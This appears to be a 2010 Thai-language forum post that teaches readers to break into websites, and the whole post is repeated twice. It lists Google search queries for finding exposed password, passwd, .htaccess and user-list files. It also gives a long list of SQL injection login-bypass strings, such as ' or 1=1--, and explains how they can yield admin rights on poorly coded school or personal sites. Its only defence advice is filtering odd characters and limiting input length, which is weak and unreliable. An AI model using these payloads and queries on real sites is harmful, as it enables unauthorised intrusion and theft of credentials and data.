minza1
10-01-2010, 07:33 PM
tip เทคนิกในวันนี้เราจะเสนอการเจาะweb siteแบบง่ายๆให้ทุกท่านได้รับรู้และป้องกันตัวเองได้โดยเริ่มจาก
การใช้ Google ค้นหาข้อมูลลับ
"Index of /admin"
"Index of /password"
"Index of /" +passwd
"Index of /" +password.txt
"Index of /mail"
"Index of /" +alluser
"Index of /" +alluser.txt
"Index of /" +.htaccess
คำสั่งอาจจะมากกว่านี้ลองเอาไปประยุกต์ใช้กันดู
คำสั่งเจาะระบบ login
or''='
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
อันนี้เป็นการ Hack เว็บที่ใช้ฐานข้อมูลเป็น SQL ซึ่งตามที่ต่างๆก็จะอุด Bug ตรงส่วนนี้ไว้เรียบร้อยแล้ว
แต่ก็มีบางเว็บ site (Script เขียนเองซึ่งมักจะเป็นเว็บไซต์ของโรงเรียนหรือเว็บส่วนบุคคล) ที่มักจะมีรูรั่วนี้
ออกมาให้เห็น
หลังจากที่การ Login ค่าที่เป็นไปได้หลังจากการ login ก็คือ
1.ได้รับสิทธิ์ของ User นั้นๆ
2.ได้รับสิทธ์เท่ากับคนอื่นๆ
3.ได้รับสิทธ์เป็นผู้ใช้ที่อยู่อันดับแรกหรือท้ายของตาราง (admin)
4. ไม่ได้อะไร
นอกจากการอัดฉีดคำสั่งเหล่านี้ลงไปแล้วนั้นยังมีคำสั่งอื่นๆที่สามารถอัดลงไปได้อีกเช่น
SELECT * FROM User WHERE
SELECT * FROM * WHERE
'GROUP BY username;--
'employee.feild'
เป็นต้นซึ่งเป็นคำสั่ง SQL สามารถหาความรู้ได้จากที่ต่างๆใน internet
การป้องกันโดยพื้นฐานนั้นก็คือการกรองค่าอักขระแบบแปลกๆออกไปจากข้อความที่รับเข้ามาเช่น
&!@#$%^ เป็นต้นหรือการจำกัดความยาวของช่องรับข้อความก็เป็นอีกหนึ่งวิธีที่น่าสนใจ
การใช้ Google ค้นหาข้อมูลลับ
"Index of /admin"
"Index of /password"
"Index of /" +passwd
"Index of /" +password.txt
"Index of /mail"
"Index of /" +alluser
"Index of /" +alluser.txt
"Index of /" +.htaccess
คำสั่งอาจจะมากกว่านี้ลองเอาไปประยุกต์ใช้กันดู
คำสั่งเจาะระบบ login
or''='
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
อันนี้เป็นการ Hack เว็บที่ใช้ฐานข้อมูลเป็น SQL ซึ่งตามที่ต่างๆก็จะอุด Bug ตรงส่วนนี้ไว้เรียบร้อยแล้ว
แต่ก็มีบางเว็บ site (Script เขียนเองซึ่งมักจะเป็นเว็บไซต์ของโรงเรียนหรือเว็บส่วนบุคคล) ที่มักจะมีรูรั่วนี้
ออกมาให้เห็น
หลังจากที่การ Login ค่าที่เป็นไปได้หลังจากการ login ก็คือ
1.ได้รับสิทธิ์ของ User นั้นๆ
2.ได้รับสิทธ์เท่ากับคนอื่นๆ
3.ได้รับสิทธ์เป็นผู้ใช้ที่อยู่อันดับแรกหรือท้ายของตาราง (admin)
4. ไม่ได้อะไร
นอกจากการอัดฉีดคำสั่งเหล่านี้ลงไปแล้วนั้นยังมีคำสั่งอื่นๆที่สามารถอัดลงไปได้อีกเช่น
SELECT * FROM User WHERE
SELECT * FROM * WHERE
'GROUP BY username;--
'employee.feild'
เป็นต้นซึ่งเป็นคำสั่ง SQL สามารถหาความรู้ได้จากที่ต่างๆใน internet
การป้องกันโดยพื้นฐานนั้นก็คือการกรองค่าอักขระแบบแปลกๆออกไปจากข้อความที่รับเข้ามาเช่น
&!@#$%^ เป็นต้นหรือการจำกัดความยาวของช่องรับข้อความก็เป็นอีกหนึ่งวิธีที่น่าสนใจ